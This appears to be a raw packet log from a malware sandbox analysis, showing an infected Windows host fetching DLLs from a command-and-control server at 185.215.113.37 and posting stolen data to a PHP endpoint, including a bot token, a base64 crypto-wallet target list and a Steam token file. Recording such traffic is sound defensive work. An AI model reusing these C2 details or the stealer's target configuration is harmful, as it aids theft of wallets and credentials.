20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 1, 2024 16:50:06.102440119 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:06.320306063 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 1, 2024 16:50:06.752203941 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:06.970217943 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 1, 2024 16:50:07.276669979 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:07.508528948 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:07 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 1, 2024 16:50:08.969973087 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:10.186145067 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 1, 2024 16:50:10.190573931 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 1, 2024 16:50:10.191323996 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 1, 2024 16:50:10.231794119 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:10.450053930 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 1, 2024 16:50:11.241621017 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 16:50:12.125379086 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:12.184554100 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 2d 2d 0d 0a Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="message"wallets------DGCBAFIJDGHCAKECAEGC--
Oct 1, 2024 16:50:12.405011892 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:12 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 1, 2024 16:50:12.407496929 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"files------BFHDAEHDAKECGCAKFCFI--
Oct 1, 2024 16:50:12.628135920 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:12.644371986 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="file"------CFBFHIEBKJKFHIEBFBAE--
Oct 1, 2024 16:50:13.358166933 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:13.411087990 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"ybncbhylepme------BFHDAEHDAKECGCAKFCFI--
Oct 1, 2024 16:50:13.635405064 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:13 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5733 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 